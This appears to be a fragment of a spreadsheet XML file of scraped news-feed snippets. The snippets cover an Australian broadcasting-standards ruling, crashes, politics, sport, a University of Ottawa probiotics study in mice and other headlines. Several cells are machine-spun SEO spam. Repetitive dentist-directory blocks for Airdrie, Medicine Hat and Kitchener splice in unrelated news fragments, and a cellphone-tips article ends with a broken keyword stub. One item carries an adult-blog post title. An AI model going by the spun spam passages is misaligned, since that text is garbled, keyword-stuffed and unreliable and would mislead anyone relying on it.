for a 7pm Sunday timeslot in a PG timeslot, with 14 instances of mild coarse language, including terms such as ‘arse’, ‘shit’, ‘d***’, ‘d***head’, ‘pisses me off’, ‘pissed me off’ and ‘pussy’. In a PG slot mild or socially offensive coarse language may be used infrequently, when justified by the story line or program context. “Nine also ensured that expletives of stronger impact such as ‘f***’ were entirely beeped and blurred so as to negate their impact. Nine submits that these measures complied with the Guidelines as it ensured that higher impact coarse language was not broadcast during a PG programme,” said Nine. Nine also defended, “The Episode did not contain any visual depiction of sexual activity. The only references to sexual content contained in the Episode were by way of verbal references. Nine again notes that viewers were given ample warning of this content at the commencement of the Episode via the visual warning which advised that the program contained sexual references.” Nine was cleared by the Australian Communications and Media Authority on all counts.</t>
  </si>
  <si>
    <t>Shakti Langlois-Ortega</t>
  </si>
  <si>
    <t>A major crash implicating two trucks and another vehicles has forced the closure of highway 440 west in Laval, Sûreté du Québec (SQ) said.</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</si>
  <si>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A Young Girl's Rape in India Becomes a Crisis for Modi by USA Consumer Credit Counseling, Felipe Escobar on Wednesday 21 August 2019 05:41 PM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A Young Girl's Rape in India Becomes a Crisis for Modi Wednesday 21 August 2019 05:32 PM UTC-05 | Tags: consumer-credit-counseling-service https://firmadeabogadosmedellin.blogspot.com/p/hillsboro-oregon-consumer-credit.html Politicians have resigned, the Supreme Court has stepped in and opposition leaders are trying to push the prime minister into a corner. from A Young Girl's Rape in India Becomes a Crisis for Modi via A Young Girl's Rape in India Becomes a Crisis for Modi April 14, 2018 at 10:09AM Tags: Everett, Washington Consumer Credit Counseling Service | (888) 551-1270 via A Young Girl's Rape in India Becomes a Crisis for Modi August 21, 2019 at 05:10PM Copyright © August 21, 2019 at 05:10PM Tags: consumer-credit-counseling-service</t>
  </si>
  <si>
    <t>Jade Macmillan</t>
  </si>
  <si>
    <t>The Home Affairs Minister is urging the Australian Federal Police Commissioner to consider "broader public interest implications" before investigating journalists, following criticism of AFP raids on the ABC and the home of a News Corp reporter.</t>
  </si>
  <si>
    <t>Regulator Ofgem publishes National Grid report into outage that hit homes and transport in England and Wales. The post Lightning strike ‘partly to blame’ for power cut appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Shannon Beattie</t>
  </si>
  <si>
    <t>An XPA by Nick Logan and Chris Webb has won Froth Craft Brewery’s annual home brew competition.</t>
  </si>
  <si>
    <t>Adam Goodes urged Shaun Burgoyne to keep playing for as long as he can over breakfast ahead of the Hawthorn veteran’s record-breaking game on Friday night.</t>
  </si>
  <si>
    <t>Des candidats francophones sont encouragés à soumettre leur candidature en français. L’anglais n’est pas réquis pour ce role. We are currently looking for baristas to work at our top-quality gelato café and bistro, located in Gatineau-Hull across from the Museum of History (and directly across the river from Major’s Hill Park). We opened in July .. Read more</t>
  </si>
  <si>
    <t>Pinned onto Uncategorized Florida courts take drug crimes seriously because people who abuse substances aren’t just putting themselves in danger. They’re also risking the lives of those around them. For example, if someone gets behind the wheel while under the influence of drugs, he or she is also endangering everyone else on the road. Heroin, in particular, has [ ] Source by digitalissy</t>
  </si>
  <si>
    <t>J Airdrie Springs Dental #280 – 2700 Main St. South (Located By Coop) Airdrie, T4B 2V1 Looking for a top rated dentist in Airdrie? You got it! We are a friendly, team who will make you feel at home from your very first visit. We offer all services from orthodontics. Dentists In Airdrie The top rated &amp; reviewed dentists in Airdrie, AB. See below for which dentists are accepting new patients, their profile, credentials and clinic locations. See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from North Lanarkshire – Scotland. Do you want to know who is in the top 100 ?. Cost calculator is based on a certain amount of previous. The Best Dentists in Airdrie Handpicked Top 3 Dentists in Airdrie, AB. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence. You. Body found in Madagascar in police search for student who ‘jumped from plane’ – always seeking to extend her knowledge and experience in the best ways possible," they said. Babies Scots mum in warning to. Kid Friendly Dental Clinic In Airdrie Alberta Top Dentist In Airdrie Number 1 Dental Clinic In Airdrie RAM clinic returns to Gray from Nov. 1-3 – Remote Area Medical is planning to return to Gray later this year to offer a range of health care services at dentists and opticians. “Pharmacists are available on your local high street and are trained clinicians who can provide. Reviews on Dentist in Airdrie, AB – Airdrie Dental Choice, Airdrie Springs Dental, Blunston Dental Group, North Main Family Dental, Bayside Dental &amp; Orthodontics, Sierra Springs Dental, Sonata Dental, Nose Creek Dental Centre, Kingsview Dental, See here the whole list of our best Dentists from Airdrie and their surroundings reviewed by StarOfService community from Calgary – Alberta. Do you want to know who is in the top. Number 1 Dental Clinic In Airdrie Alberta Best Dentist In Airdrie Alberta Best Dentists in Airdrie, AB – Airdrie Dental Choice, Blunston Dental Group, Airdrie Springs Dental, North Main Family Dental, Sonata Dental, Bayside Dental &amp; Orthodontics, Kingsview Dental, Nose Creek Dental Centre, West Airdrie Dental, Rahul.</t>
  </si>
  <si>
    <t>U of O study links probiotics to prevention of mental illness in mice Original Source Professor Nafissa Ismail, right, and PhD student Emma Murray, centre. Research suggests consuming probiotics during puberty may help build resilience to anxiety, depression later in life A study from a team of University of Ottawa researchers has linked probiotic intake in mice during their developmental period to the prevention of mental illness later in life. Nafissa Ismail, a psychology professor at the U of O, uses animal models to research the impact of stress during puberty and how it can alter the brain and impact future behaviours. “A lot of the cases of mental illness we find during adulthood have actually begun during puberty and adolescence, but they often are not diagnosed easily or treated right away,” she says. “My work shows there are certain stressors during puberty that will predispose a mouse to depression or anxiety.” Her research has shown one avenue in which stress impacts the brain is through the gut microbiome, the complex collection of bacteria living inside the intestines. Stressful events can cause this bacteria to become more inflammatory and to leak from the gut, Ismail says. If they leak into the bloodstream, bacteria are then carried to the brain where they can cause neuroinflammation. And while the brain is equipped with cells to fight this kind of inflammation, they’re not as effective at doing their job during puberty. In humans, these kinds of stressful events that can predispose a person to mental illness can include bullying or sexual abuse, Ismail says. “So the neuroinflammation will persist and then alter the brain circuits involved in anxiety and depression, which is why we’d see the illnesses later on,” she adds. Ismail has found sex differences exist in mice: females are more likely to develop depression or display depressive behaviour, while in males, anxiety is the more common culprit. In her most recent study, published in June in the Brain, Behaviour and Immunity journal, Ismail and PhD student Emma Murray wanted to investigate the role probiotics, live bacteria commonly found in yogurt and fermented milk, could play in building resilience to mental illness through the gut microbiome. In the study, the team exposed the control group of mice to skim milk and the experimental group to probiotic fermented milk (kefir) during their developmental period, which is six weeks. Both groups were also exposed to a bacterial endotoxin to trigger a stress and immune response. The team then followed the mice into adulthood, looking for development of mental illness using open field and maze tests that can help gauge the animal’s behaviour. They found mice exposed to skim milk showed signs of anxiety and depression, while the mice exposed to the probiotic-rich kefir did not. The findings suggest probiotics may be protecting against the development of stress-induced mental illness later in the lifespan, Ismail says. “It’s probably a good idea to take some probiotics during puberty to prevent and buffer the impacts of stress,” Ismail says. Consuming prebiotics, which help feed probiotics and are commonly found in bananas, onions and garlic, may also be helpful, she adds. The next step for Ismail and her team is to isolate the specific types of probiotics which may promote resilience to mental illness. “We want to narrow it down to the specific bacteria so we can develop probiotic products or better guide the population in the (probiotic) choices they make,” Ismail says, adding the team is also on the hunt for isolating which bacteria are increasing the leakiness of the gut. “My passion is to prevent mental illness,” Ismail says. “We have spent so many years trying to find effective treatments for mental illness but have we been effective? Not really.” “We have spent all these years studying the brain like it’s an isolated organ, forgetting that it belongs to the body and interacts with lots of other organs,” Ismail says. “At least if we can prevent (the onset) of mental illness during puberty, already we will have rescued a big portion of the population.” (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = ‘https://connect.facebook.net/en_US/sdk.js#xfbml=1&amp;version=v3.1’; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’)); (function(d, s, id) var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = “http://connect.facebook.net/en_US/all.js#xfbml=1”; fjs.parentNode.insertBefore(js, fjs); (document, ‘script’, ‘facebook-jssdk’));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U of O study links probiotics to prevention of mental illness in mice appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>llinki</t>
  </si>
  <si>
    <t>Electronics charger car phone wireless Wireless car charger at 25% off with discount code. Reduced from $33.99 to $25.42. 7.5W Compatible with iPhone Xs/X/ 8/8 Plus, 10W Fast Charging Samsung Galaxy Note 9 S8 S8 Plus S7 S7 Edge S6 Edge Plus. One hand operation, containing a built-in advanced sensor. Two clips of the mount will automatically close and grip your phone when the phone is attached to the holder; To release the phone, press quick-release button on the right side（Press the button on the back when wearing gloves）the clips will automatically open ,then you can take the phone out.</t>
  </si>
  <si>
    <t>Mentally ill people are much more likely to be the victims of violence than the perpetrators, but we need better alert systems for the rare dangerous cases.</t>
  </si>
  <si>
    <t>Donald Trump has threatened to use an obscure federal law to order US businesses to cut ties with China as the trade war between the two countries escalates. Read more? Click here</t>
  </si>
  <si>
    <t>Caia van Maasakker scored a wonderful drag flick to put the Dutch 3-0 up in the second quarter EuroHockey Championships Venue: Wilrijkse Plein, Antwerp Date: 16-24 August Coverage: The BBC will be showing all home nations matches live on the BBC Sport website and Connected TVs England women were thrashed 8-0 by defending champions the Netherlands in the EuroHockey Championships semi-finals. They conceded three first-half goals before shipping five in the final two quarters in Antwerp, Belgium. The Netherlands, chasing their 18th European title, face Spain or Germany in Sunday’s final. England’s defeat means Great Britain miss out on automatic qualification for the Tokyo 2020 Olympics. The reigning Olympic champions will now play a two-legged qualifier at home in November, which they must win to reach Tokyo. “That was probably the lowest point of my career so far so a tough one to swallow,” goalkeeper Maddie Hinch told BBC Sport. “We’ve got some work to do. We’re just not learning and we were nowhere near.” They still have a chance to win a bronze medal in Antwerp on Sunday in the third-place match, which is live on the BBC Sport website at 12:20 BST. England, who were European bronze medallists two years ago, picked up two wins a draw as they topped Pool B in the group stages.</t>
  </si>
  <si>
    <t>Canada was home to more than 40,000 German prisoners of war and the largest PoW camp was on the rolling prairie hills just. Cosmetic Dentist Near Medicine Hat The dentists at River Dental in Medicine Hat offer a variety of cosmetic services to help maintain or create your healthy smile. Dental Implants Permanent dental implants can replace missing teeth, so you will not have to worry about unsightly gaps in your smile again. The Canadian system, however, does not include dental, vision. leaving Most Popular Online Messaging Categories Whitening Endodontists Pediatric Rate these results View on the map Ad 1 Southside Dental 10-2020 Strachan Rd SE, Medicine Hat, AB T1B 0M9 Directions. Hat through to semis at Canadian Junior Little League Championship – While Quebec enters Saturday’s semifinal as the undefeated top seed, Medicine Hat gave them the best run for their money in. Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Alberta. We're the original doctor ratings site with over 2 million reviews. I drive all the way from Medicine Hat to see dr Chan and I am a TOTAL BABY. He is absolutely worth the drive and I. Preferred Dentist Near Medicine Hat Number 1 Dentist In Medicine Hat Please provide a keyword, business name or phone number. Canada Business Directory Alberta Medicine Hat Dentists in Medicine Hat 43 results for Dentists in Medicine Hat, AB Southside Dental. What you need to know about the 2019 Canadian Little League Championship in Ancaster – Calgary West went five and And when you turn up the tunes on the way to Medicine Hat, you’d best buckle up for gorgeous scenery. southwest to Writing. Even though there are a variety of names in Canada for the first Monday of August, most areas of the country observe it as a public holiday. In Alberta we call it Heritage Day. There are different. Most Popular Dental Clinic Near Medicine Hat Alberta Highly Diversified Team Serving the Medicine Hat community for over 40 years, Crestwood Dental Clinic features a diverse group of dentists, hygienists, and dental assistants. I drive all the way from Medicine Hat to see dr Chan and I am a TOTAL BABY. He is absolutely worth the drive and I would drive twice as Looking for dentist or dental care clinic in Medicine Hat, AB? Contact Gaslight Dental Health Ctr (Frank Gregory DDS) located in 578 3 St SE # 304, Medicine Hat, AB, T1A 0H3, at 403-527-5526 to get working hours, information about their dental care options. The Best 10 Dentists in Medicine Hat, AB Showing 1-10 of 23 Medicine Hat Health &amp; Medical Dentists. Dr Whitzke is the most knowledgable dentist in Medicine Hat! We had terrible experiences at other offices in the city. He is friendly and treats his patients.</t>
  </si>
  <si>
    <t>Typhoon Lekima has triggered landslides and floods in southeast China, killing at least 45 people and racking up an enormous economic bill for the nation.</t>
  </si>
  <si>
    <t>Davis has issued 20 walks in 31 2/3 innings, nine on the road where he has a 0.68 ERA and 11 at Coors Field where his ERA is 11.29 Source: Sports Business News</t>
  </si>
  <si>
    <t>Celebrities in Iran have been found riding ambulances to avoid sitting in traffic jams, according to the head of the private ambulance service. Read more? Click here</t>
  </si>
  <si>
    <t>Sergey Kovalev had a few tense moments on Saturday in Chelyabinsk, Russia, but he earned a win by 11th-round KO. Source: Sports Business News</t>
  </si>
  <si>
    <t>The French President has told Boris Johnson the EU will not tear up the Brexit deal negotiated by Theresa May.</t>
  </si>
  <si>
    <t>August 9, 2019. Former NRL reserve grade player Liam Coleman, accompanied by father Craig Coleman, leaves Waverley Local Court in Sydney after a hearing into allegations he groped a woman at a pub. He denies the allegations. (AAP Video/Luke Costin)</t>
  </si>
  <si>
    <t>Immigrants can get permits to work legally in the United States once their asylum applications are pending before a judge for six months, which many with fast-tracked cases won’t get to do, lawyers said.</t>
  </si>
  <si>
    <t>UK onshore: winds of change? Original Source This month saw a letter sent to Boris Johnson signed by 157 Members of Parliament (35 Conservatives among them), urging the Government change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UK onshore: winds of change? appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>Isaac Hayden has been asked if he will still be at St James Park after 5pm on Thursday. The midfielder’s response was to say ‘I couldn’t answer that question right...Isaac Hayden has been asked if he will still be at St James Park after 5pm on Thursday. The midfielder’s response was to say ‘I couldn’t answer that question right... You can click here to read the full article. The post Isaac Hayden says he could leave Newcastle United this week appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>Rolling tech from our favourite label from the cosmos, Planetary Notions. Out Get your copy: https://www.decks.de/track/per_hammar-worker_union-walker-short_waves-pattern_030-minimal_beauty/cex-pl The post JUST IN: Per Hammer – Short Waves [Planetary Notions] appeared first on Dubster.</t>
  </si>
  <si>
    <t>The best photos from the international wire agencies as chosen by our picture editors.</t>
  </si>
  <si>
    <t>BBC News - Health</t>
  </si>
  <si>
    <t>The World Health Organization blames misinformation for the global resurgence of the disease. The post Measles: Four European nations lose eradication status appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Phil Heidenreich</t>
  </si>
  <si>
    <t>Four days after the Alberta Energy Regulator was told 40,000 litres of oil emulsion leaked from a pipeline into a creek that feeds into the North Saskatchewan River, Edmonton's primary utility provider says the city's drinking water is "perfectly safe."</t>
  </si>
  <si>
    <t>As Luke Cornish worked in his studio, the two-time Archibald Prize finalist wondered whether he should head back to the beach and spray paint another mural.</t>
  </si>
  <si>
    <t>Magnus Nicolin, the boss of ASX-listed Ansell, has said manufacturers are exiting China because of rising costs and fears over the US/China trade war.</t>
  </si>
  <si>
    <t>taigatrommelchen posted a photo: Building and deli at the corner of 8th Avenue/ West 25th</t>
  </si>
  <si>
    <t>On Sunday Morning, Lee Charnley had extensive comments in the matchday programme. He spouted the same old tripe about putting all of the money the club earns back in the club and […] This post written by Neil Harrison originally appeared on The Newcastle United Blog. Read the full post here. Source</t>
  </si>
  <si>
    <t>RACQ LifeFlight Rescue was told the car made an effort to swerve to miss a kangaroo but the car rolled and burst into flames.</t>
  </si>
  <si>
    <t>Benjamin Law</t>
  </si>
  <si>
    <t>The Tokyo-born architect, responsible for some of Sydney’s most recognisable new buildings, discusses the subjects we are often told to keep quiet about.</t>
  </si>
  <si>
    <t>Luke Thomas Strike Downs Promotion Favourites Fulham BARNSLEY, ENGLAND – AUGUST 03: Luke Thomas of Barnsley celebrates after scoring his teams first goal of the match during the Sky Bet Championship match between Barnsley and Fulham at Oakwell Stadium on August 03, 2019 in Barnsley, England. (Photo by George Wood/Getty Images) Promotion favourites Fulham were beaten 1-0 by Barnsley on the opening day of the Sky Bet Championship. Luke Thomas scored the all-important goal for the Tykes in the first half. Promotion Favourites Fulham Downed By Luke Thomas Debut Striker Scores to Down Whites Fulham were unable to get a winning start to their Sky Bet Championship campaign as they were beaten 1-0. Barnsley were under the cosh for much of the game; however, the newly-promoted side held on after Thomas’ first-half goal. The Tykes debutant scored what proved to be the winner when he reeled onto Mike Bahre’s pass and beat Marcus Bettinelli with a powerful shot. Defender Mads Andersen twice cleared off the line as Barnsley were put under pressure. Substitute Anthony Knockaert forced a save from Tykes ‘keeper Samuel Radlinger as the visitors were left frustrated. Scott Parker Describes Fulham Performance As ‘Disappointing’ Fulham were relegated from the top flight last season. The Whites conceded 81 league goals and sacked two managers. However, an opening day defeat to Barnsley left Whites boss Scott Parker disappointed. “We knew it was going to be a tough battle in the first game of the season, which it proved to be,” Parker, who was appointed on a permanent basis in the summer, said to BBC Sport. “We started ok in the first 10 minutes of the first half, but Barnsley got a grip of the game and caused us a few problems. “In the second half we got into the game and we had chances which they defended heroically at times, but overall it’s very disappointing.” Daniel Stendel Praises Tykes In ‘Deserved’ Win Daniel Stendel led Barnsley to promotion from League One last term; however, the German gave debuts to six summer signings as he made a plethora of changes to his promotion-winning team. “I’m very happy about the result but more about the performance today,” he said to BBC Sport. “We knew that Fulham have a good squad but if we played with more conviction we had a chance to win this game. “Most of the time we played really well, Fulham had some chances in the second half, but we deserved to win.” This post Luke Thomas Strike Downs Promotion Favourites Fulham appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>Wollongong City Council's declarion brings the total number of NSW councils declaring or recognising climate emergencies to 16.</t>
  </si>
  <si>
    <t>Girl's trip to Greece! | Annam Ahmad Vlog The post Girl's trip to Greece! | Annam Ahmad Vlog appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>▶▶ Subscribe NOW to our Beach Volleyball channel: ▶▶ https://go.volleyball.world/SubscribeBVB?ytv=d Watch the live stream of the ‘Shepparton 1-Star 2018 – Beach Volleyball World Tour’ here! More info: http://worldtour.2018.fivb.com/en/561 About the FIVB The FIVB is the governing body responsible for all forms of volleyball on a global level. Working closely with national federations and private enterprises […] The post Shepparton 1-Star 2018 – Men bronze – Beach Volleyball World Tour appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>About 15 kilometres of southbound delays had built up 90 minutes after the crash, between Loganholme and Eight Mile Plains.</t>
  </si>
  <si>
    <t>Canadian landscaper Bon Truong used the same lottery numbers for 30 years. 10 months ago, his persistence finally paid off.</t>
  </si>
  <si>
    <t>If Dundee United’s Betfred Cup exit at the group stages was painful, but by no means disastrous, it might just have come with a sting in the tail.</t>
  </si>
  <si>
    <t>Are you looking for a cellphone? Do you need to be certain you use the right company? Do you want to know tricks and tips that make living with a cell phone easier? The purpose of the advice in this article is to help you find your way around your phone. Restart your phone periodically to purge the memory of programs like Facebook and Twitter. In this way, you will be able to get the best performance from your phone. If you see a LTE or 4G signal, steer clear of videos. You’ve likely got a cap on the data you can use each month. Video will take up a lot of your memory. When you’re going over a lot, consider a bigger plan. Don’t throw away your cell phone if liquid gets into it. The best thing to do would be to remove the battery and place the phone in a bowl of rice. This pulls the moisture from the phone. Don’t always rush to update to the latest phone. Many times, it’s not necessary. Newly released cell phones often have only minor changes and updates. Look at cell phone reviews prior to purchasing a new one. In many cases, you do not. If your cell phone is a smartphone, you’re more than likely using it during the day. Make sure you turn it off here and there. This keeps your phone working well. A restart clears up memory. You should notice that there’s a big difference when you use your cell phone after you turn it off a couple of times each week. Remember that smartphones also get slower through time. If you update your software, it can help to keep the phone running. That said, the updates are bigger and more powerful. The older phones may not be able to get these updates. Are you working with a cell phone that dies a lot? You could have a weak signal. Believe it or not, a weak signal can drain a battery. If your phone is going to be stowed away where you’ve got weak signal, don’t keep it on. If you have a smartphone, you may use it frequently during the day. Make sure you turn it off here and there. Smartphones are just like computers. It will run better when it is restarted and the memory is clear. A few resets a week should give you a boost in performance. Be aware of extended warranties. These are extra costs that tend to only be extra costs. If a cell phone is going to fail, it typically happens in the first year which is normally covered by the basic warranty. Also, a lot of people get new cell phones each year, so an extended warranty really isn’t worth it. Does your battery seem to die quickly? You might be experiencing a weak signal. Weak signals can drain batteries. When not using your cell phone, don’t store it in a signal-less location like closets or drawers. Smartphones get slower as they age. As time passes, simple things like updating apps could become cumbersome. In many cases, making a choice becomes necessary. You can continue as is by not updating, or you can look at your upgrade options. When cell phones get older, they begin to slow down. Thus, you might find it harder and harder to update the phone’s software. There are times where must to choose. Your choices are typically going to be sticking with what you know, or moving up to a newer make and model. Take the time to compare cellphones in brick and mortar stores. Invest some time playing with the cell phones and testing them. You will almost always find one that you love. As the time to purchase a newer phone approaches, shop in-store and compare prices between carriers. Hold various models in your hands and try them out. That way, you’ll better your chances of getting a phone that you’ll enjoy. Make sure that your smartphone is a necessity. Smartphones cost a lot of money, and they offer good value if the features are useful to you. The problem with this is that most people just use their phone to make basic phone calls. If this is you, purchasing a smartphone could be unnecessary for you. This may not be what is right for you. If you always buy a certain kind of phone, think about another option for once. Although you may feel more comfortable with one over the other, trying out new things is never a bad idea. Looking at other phones can show you a whole world of functionality. Know that your camera on your phone won’t come with an optical zoom. Move closer to get a better shot. You might also purchase specialized lenses that work with your phone, allowing you to take better pictures. Hopefully, you are feeling more capable of incorporating the miracles of mobile technology into your everyday life. You can keep up with your daily life if you have a smartphone. Keep these tips in mind. You should buy a new cellphone every couple years to stay current with the technology. Mobile websites usually work with newer phones. This means that you’re going to have a difficult time using them if you have an outdated phone. This information served as a great tutorial regarding betamax price comparison|. This article contains all the information you need to gain a solid footing when it comes to betamax price comparison|. Now, all you have to do is use this article’s tips.</t>
  </si>
  <si>
    <t>/u/megehop</t>
  </si>
  <si>
    <t>submitted by /u/megehop [link] [comments] The post Busty Redhead Wife appeared first on All Amateur Blog.</t>
  </si>
  <si>
    <t>A post on the Population Matters Facebook page recently scored four million likes.</t>
  </si>
  <si>
    <t>Three buildings collapsed as the fire swept through the mill on Tuesday. The post Ashton-under-Lyne mill fire: Homes evacuated as crews tackle blaze appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Rarely do you come across “real” photos of celebrities and influencers on social media, but one supermodel has done just that by sharing a brutally honest snap with her 8.8 million Instagram followers.</t>
  </si>
  <si>
    <t>Design junkies know his work, and fans of retro real estate love his trademark style. It’s safe to say that award-winning architect Ken Woolley put his stamp on Sydney suburbia and buyers are still reaping the rewards today.</t>
  </si>
  <si>
    <t>An administrative court in Rome ruled on Wednesday that a Spanish rescue ship carrying around 150 migrants should be allowed to enter Italian territorial waters in defiance of a ban imposed by Interior Minister Matteo Salvini. CBC | World News Court rules migrant ship can enter Italian waters, defying interior minister</t>
  </si>
  <si>
    <t>Highest Rated Dentist Near Kitchener Tim Cowlishaw: Who needs winning when you do business like the Dallas Cowboys? – This is based not only on their ability to generate income that blows away its NFL competition through premium seating and. Number 1 Dentist Near Kitchener Ontario Dr. Hustwitt pedi dentist, Kitchener, Ontario. 1 like · 2 were here. Dentist &amp; Dental Office. Sign up for Facebook today to discover local businesses near you. Second bat tests positive for rabies in Waterloo Region – Early last week, a bat tested positive in Kitchener. "It’s not unexpected at this time. it’s the first rabid bat confirmed in the county since 1990. Given the number of bats in Ontario, it said. Kid Friendly Dental Clinic Near Kitchener Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Coloring. The west suburb of DuPage County, which was once named one of the top places to raise children across the nation, is known. Dentists &amp; Dental Clinics Kitchener, ON; Family Dentistry Kitchener, ON. Family Dentistry in Kitchener, ON (Results 1 – 20 of 169) Switch to Map. 43.3963879,-80.463123. Mi Dental. Ontario, 1606 Battler Road N2R 0C9 Kitchener (519) 894-9444. Closed. Opening Hours; midental.ca; We treat our patients the way we ourselves would like to be treated, with compassion and integrity. We strive. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Kitchener Dental – 1375 Weber St E Suite 23, Kitchener, Ontario N2A 3Y7 – Rated 5 based on 6 Reviews "I have been a patient for 1/3 of my life. Dr. Joe's. Best Dental Clinic Near Kitchener Ontario In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. Number 1 Dentist Near Kitchener Ontario Dr. Hustwitt pedi dentist, Kitchener, Ontario. 1 like · 2 were here. Dentist &amp; Dental Office. Sign up for Facebook today to discover local businesses near you. Second bat tests positive for rabies in Waterloo Region – Early last week, a bat tested positive in Kitchener. "It’s not unexpected at this time. it’s the first rabid bat confirmed in the county since 1990. Given the number of bats in Ontario, it said. Kid Friendly Dental Clinic Near Kitchener Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Coloring. The west suburb of DuPage County, which was once named one of the top places to raise children across the nation, is known. Dentists &amp; Dental Clinics Kitchener, ON; Family Dentistry Kitchener, ON. Family Dentistry in Kitchener, ON (Results 1 – 20 of 169) Switch to Map. 43.3963879,-80.463123. Mi Dental. Ontario, 1606 Battler Road N2R 0C9 Kitchener (519) 894-9444. Closed. Opening Hours; midental.ca; We treat our patients the way we ourselves would like to be treated, with compassion and integrity. We strive. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Ontario’s minimum wage is frozen at $14. Could Ottawa set its own? – In addition to a federal minimum wage, the seven-person panel — which included Mary Gellatly of Parkdale Community Legal. . job or abroad preferred. Two sisters married &amp; in USA &amp; Italy. CL19055180 Canada PR Arora Gursikh teetotaller 1991 born/ 6′, B.Tech. (India) PG Diploma (Kitchener – Ontario) privately employed boy, Kitchener Dental Clinic As stated above, Smile Town is a children’s dental clinic that only offers dental care for children. Our pediatric dental specialists are professionals with years of experience in working with the range of children’s needs and with children of. Most Popular Dental Clinic Near Kitchener Best Dental Clinic Near Kitchener Ontario In an interview this week, project manager Gord Low said the summer opening was a "best guess estimate" at. services. Number 1 Dentist Near Kitchener Ontario Dr. Hustwitt pedi dentist, Kitchener, Ontario. 1 like · 2 were here. Dentist &amp; Dental Office. Sign up for Facebook today to discover local businesses near you. Second bat tests positive for rabies in Waterloo Region – Early last week, a bat tested positive in Kitchener. "It’s not unexpected at this time. it’s the first rabid bat confirmed in the county since 1990. Given the number of bats in Ontario, it said. Kid Friendly Dental Clinic Near Kitchener Ongoing breastfeeding support and nutritional information is available at our WIC Clinic, Ron Wood Family. Coloring. The west suburb of DuPage County, which was once named one of the top places to raise children across the nation, is known. Dentists &amp; Dental Clinics Kitchener, ON; Family Dentistry Kitchener, ON. Family Dentistry in Kitchener, ON (Results 1 – 20 of 169) Switch to Map. 43.3963879,-80.463123. Mi Dental. Ontario, 1606 Battler Road N2R 0C9 Kitchener (519) 894-9444. Closed. Opening Hours; midental.ca; We treat our patients the way we ourselves would like to be treated, with compassion and integrity. We strive. Looking for a dentist in Waterloo? Waterloo Smiles – best dental care clinic serving family, Cosmetic and Pediatric Dentistry in Waterloo-Kitchener, ON. Book an Appointment; call. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Kids Dentist Kitchener, Ontario A pediatric dentist can offer comprehensive oral care specifically suited to the needs of your child. Just as you would take your child to a pediatrician to receive medical care, pediatric dentists undergo additional education and training to offer the highest standard of dental. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Best Pediatric Dentists in Kitchener, ON – Waterloo Smiles Dentistry, Danube Dental Clinic, Smile Town, Midgley Dental, Trillium Dental Centre, Harmony Dental Care, Toothworks Fairview Park Dental, Laurelwood Family Dentistry, Kitchener East. KW Dental is your family dentist in Kitchener and Waterloo, Ontario. Contact us today to learn about our comprehensive dental services. Preferred Dental Clinic Near Kitchener Welcome to Kitchener East Family Dental, Your Preferred Dentist in Kitchener. Whether you need cosmetic dentistry, sedation dentistry. Johal says it’s a pretty similar to trend to what’s happening in Ontario. In the region. As well, people aren’t using. Preferred Dental Clinic In Kitchener Ontario Best Dentist -&gt; Source : http://bestdentistkitchener.ca/blog/index.php/2018/12/31/preferred-dental-clinic-in-kitchener-ontario-6.</t>
  </si>
  <si>
    <t>Wolf+Bär Agency</t>
  </si>
  <si>
